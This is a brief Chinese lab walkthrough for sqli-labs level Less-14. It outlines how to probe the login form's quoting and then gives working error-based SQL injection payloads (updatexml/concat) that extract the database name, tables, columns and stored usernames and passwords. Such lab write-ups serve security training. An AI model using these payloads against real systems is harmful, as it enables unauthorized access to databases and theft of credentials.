sqli-labs靶场Less-14

本文主要是介绍sqli-labs靶场Less-14，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

1、访问首页，/Less-14/index.php，这里的传参点是表单中的uname、passwd

 探测六步

1. 判断是否是数字形传参
2. 判断是否有单引号闭合
3. 判断是否是双引号闭合
4. 判断是否单引号+括号闭合
5. 判断是否是双引号+括号闭合
6. 判断是否是延时盲注

 2、使用报错注入获取库名

" and updatexml(1,concat(0x7e,(select database())),1) -- qwe

 3、获取表名

 " and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1)),1)-- qwe

4、获取字段名

admin" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),1) -- qwe

 5、获取数据

" and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 2,1)),1)-- qwe

这篇关于sqli-labs靶场Less-14的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！